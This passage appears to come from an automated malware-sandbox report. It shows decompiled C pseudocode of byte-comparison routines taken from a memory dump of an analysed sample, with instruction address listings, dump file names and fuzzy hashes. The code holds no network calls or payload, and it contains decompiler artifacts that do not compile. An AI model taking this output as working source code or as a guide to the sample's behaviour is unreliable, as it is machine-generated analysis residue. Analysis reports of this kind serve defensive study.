				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                            0x00a00113
                            0x00a00113
                            0x00a00119
                            0x00a001a0
                            0x00a001a2
                            0x00a001a4
                            0x00000000
                            0x00000000
                            0x00a001aa
                            0x00a001b0
                            0x00a00237
                            0x00a00239
                            0x00a0023b
                            0x00000000
                            0x00000000
                            0x00a00241
                            0x00a00247
                            0x00a002ce
                            0x00a002d0
                            0x00a002d2
                            0x00000000
                            0x00000000
                            0x00a002d8
                            0x00a002de
                            0x00a00365
                            0x00a00367
                            0x00a00369
                            0x00000000
                            0x00000000
                            0x00a0036f
                            0x00a00375
                            0x00a003fc
                            0x00a003fe
                            0x00a00400
                            0x00000000
                            0x00000000
                            0x00a0040c
                            0x00a00494
                            0x00a00496
                            0x00a00498
                            0x00000000
                            0x00000000
                            0x00a0049e
                            0x00a004a4
                            0x00a0052b
                            0x00a0052d
                            0x00a0052f
                            0x00a0052f
                            0x00000000
                            0x00a0052f
                            0x00a004b1
                            0x00a004b3
                            0x00a004cb
                            0x00a004d3
                            0x00a004d5
                            0x00a004ed
                            0x00a004f5
                            0x00a004f7
                            0x00a0050f
                            0x00a00517
                            0x00a00519
                            0x00a00522
                            0x00a00522
                            0x00000000
                            0x00a00519
                            0x00a00500
                            0x00a00509
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00509
                            0x00a004de
                            0x00a004e7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a004e7
                            0x00a004bc
                            0x00a004c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a004c5
                            0x00a0041a
                            0x00a0041c
                            0x00a00434
                            0x00a0043c
                            0x00a0043e
                            0x00a00456
                            0x00a0045e
                            0x00a00460
                            0x00a00478
                            0x00a00480
                            0x00a00482
                            0x00a0048b
                            0x00a0048b
                            0x00000000
                            0x00a00482
                            0x00a00469
                            0x00a00472
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00472
                            0x00a00447
                            0x00a00450
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00450
                            0x00a00425
                            0x00a0042e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0042e
                            0x00a00382
                            0x00a00384
                            0x00a0039c
                            0x00a003a4
                            0x00a003a6
                            0x00a003be
                            0x00a003c6
                            0x00a003c8
                            0x00a003e0
                            0x00a003e8
                            0x00a003ea
                            0x00a003f3
                            0x00a003f3
                            0x00000000
                            0x00a003ea
                            0x00a003d1
                            0x00a003da
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a003da
                            0x00a003af
                            0x00a003b8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a003b8
                            0x00a0038d
                            0x00a00396
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00396
                            0x00a002eb
                            0x00a002ed
                            0x00a00305
                            0x00a0030d
                            0x00a0030f
                            0x00a00327
                            0x00a0032f
                            0x00a00331
                            0x00a00349
                            0x00a00351
                            0x00a00353
                            0x00a0035c
                            0x00a0035c
                            0x00000000
                            0x00a00353
                            0x00a0033a
                            0x00a00343
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00343
                            0x00a00318
                            0x00a00321
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00321
                            0x00a002f6
                            0x00a002ff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a002ff
                            0x00a00254
                            0x00a00256
                            0x00a0026e
                            0x00a00276
                            0x00a00278
                            0x00a00290
                            0x00a00298
                            0x00a0029a
                            0x00a002b2
                            0x00a002ba
                            0x00a002bc
                            0x00a002c5
                            0x00a002c5
                            0x00000000
                            0x00a002bc
                            0x00a002a3
                            0x00a002ac
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a002ac
                            0x00a00281
                            0x00a0028a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0028a
                            0x00a0025f
                            0x00a00268
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00268
                            0x00a001bd
                            0x00a001bf
                            0x00a001d7
                            0x00a001df
                            0x00a001e1
                            0x00a001f9
                            0x00a00201
                            0x00a00203
                            0x00a0021b
                            0x00a00223
                            0x00a00225
                            0x00a0022e
                            0x00a0022e
                            0x00000000
                            0x00a00225
                            0x00a0020c
                            0x00a00215
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00215
                            0x00a001ea
                            0x00a001f3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a001f3
                            0x00a001c8
                            0x00a001d1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0011f
                            0x00a0011f
                            0x00a00126
                            0x00a00128
                            0x00a00140
                            0x00a00140
                            0x00a00148
                            0x00a0014a
                            0x00a00162
                            0x00a00162
                            0x00a0016a
                            0x00a0016c
                            0x00a00184
                            0x00a00184
                            0x00a0018c
                            0x00a0018e
                            0x00a00197
                            0x00a00197
                            0x00000000
                            0x00a0018e
                            0x00a00172
                            0x00a00175
                            0x00a0017e
                            0x009ffcd6
                            0x009ffcd6
                            0x00a00ac7
                            0x00a00ac7
                            0x00000000
                            0x00a0017e
                            0x00a00150
                            0x00a00153
                            0x00a0015c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0015c
                            0x00a0012e
                            0x00a00131
                            0x00a0013a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0013a

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction ID: eb665f3ff6714e81a798aad0acf6aea0ee83df037154e5e54147e02c5bfb8795
                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction Fuzzy Hash: A5C1A2722091AB0ADF2D4739953463EBAA16EA27B171A076DD8F3CF4C4FE20C564D620
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A00548, Relevance: .3, Instructions: 341COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A00548(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                            0x00a00548
                            0x00a00548
                            0x00a0054e
                            0x00a005d6
                            0x00a005d8
                            0x00a005da
                            0x00000000
                            0x00000000
                            0x00a005e0
                            0x00a005e6
                            0x00a0066d
                            0x00a0066f
                            0x00a00671
                            0x00000000
                            0x00000000
                            0x00a00677
                            0x00a0067d
                            0x00a00704
                            0x00a00706
                            0x00a00708
                            0x00000000
                            0x00000000
                            0x00a0070e
                            0x00a00714
                            0x00a0079b
                            0x00a0079d
                            0x00a0079f
                            0x00000000
                            0x00000000
                            0x00a007ab
                            0x00a00833
                            0x00a00835
                            0x00a00837
                            0x00000000
                            0x00000000
                            0x00a0083d
                            0x00a00843
                            0x00a008ca
                            0x00a008cc
                            0x00a008ce
                            0x00000000
                            0x00000000
                            0x00a008d4
                            0x00a008da
                            0x00a00961
                            0x00a00963
                            0x00a00965
                            0x00000000
                            0x00000000
                            0x00a00973
                            0x00a00975
                            0x00a0098d
                            0x00a00995
                            0x00a00997
                            0x00a000f0
                            0x00a000f8
                            0x00a000fa
                            0x00a00107
                            0x00a00107
                            0x00000000
                            0x00a000fa
                            0x00a009a4
                            0x00a000ea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a000ea
                            0x00a0097e
                            0x00a00987
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00987
                            0x00a008e7
                            0x00a008e9
                            0x00a00901
                            0x00a00909
                            0x00a0090b
                            0x00a00923
                            0x00a0092b
                            0x00a0092d
                            0x00a00945
                            0x00a0094d
                            0x00a0094f
                            0x00a00958
                            0x00a00958
                            0x00000000
                            0x00a0094f
                            0x00a00936
                            0x00a0093f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0093f
                            0x00a00914
                            0x00a0091d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0091d
                            0x00a008f2
                            0x00a008fb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a008fb
                            0x00a00850
                            0x00a00852
                            0x00a0086a
                            0x00a00872
                            0x00a00874
                            0x00a0088c
                            0x00a00894
                            0x00a00896
                            0x00a008ae
                            0x00a008b6
                            0x00a008b8
                            0x00a008c1
                            0x00a008c1
                            0x00000000
                            0x00a008b8
                            0x00a0089f
                            0x00a008a8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a008a8
                            0x00a0087d
                            0x00a00886
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00886
                            0x00a0085b
                            0x00a00864
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00864
                            0x00a007b9
                            0x00a007bb
                            0x00a007d3
                            0x00a007db
                            0x00a007dd
                            0x00a007f5
                            0x00a007fd
                            0x00a007ff
                            0x00a00817
                            0x00a0081f
                            0x00a00821
                            0x00a0082a
                            0x00a0082a
                            0x00000000
                            0x00a00821
                            0x00a00808
                            0x00a00811
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00811
                            0x00a007e6
                            0x00a007ef
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a007ef
                            0x00a007c4
                            0x00a007cd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a007cd
                            0x00a00721
                            0x00a00723
                            0x00a0073b
                            0x00a00743
                            0x00a00745
                            0x00a0075d
                            0x00a00765
                            0x00a00767
                            0x00a0077f
                            0x00a00787
                            0x00a00789
                            0x00a00792
                            0x00a00792
                            0x00000000
                            0x00a00789
                            0x00a00770
                            0x00a00779
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00779
                            0x00a0074e
                            0x00a00757
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00757
                            0x00a0072c
                            0x00a00735
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a00735
                            0x00a0068a
                            0x00a0068c
                            0x00a006a4
                            0x00a006ac
                            0x00a006ae
                            0x00a006c6
                            0x00a006ce
                            0x00a006d0
                            0x00a006e8
                            0x00a006f0
                            0x00a006f2
                            0x00a006fb
                            0x00a006fb
                            0x00000000
                            0x00a006f2
                            0x00a006d9
                            0x00a006e2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a006e2
                            0x00a006b7
                            0x00a006c0
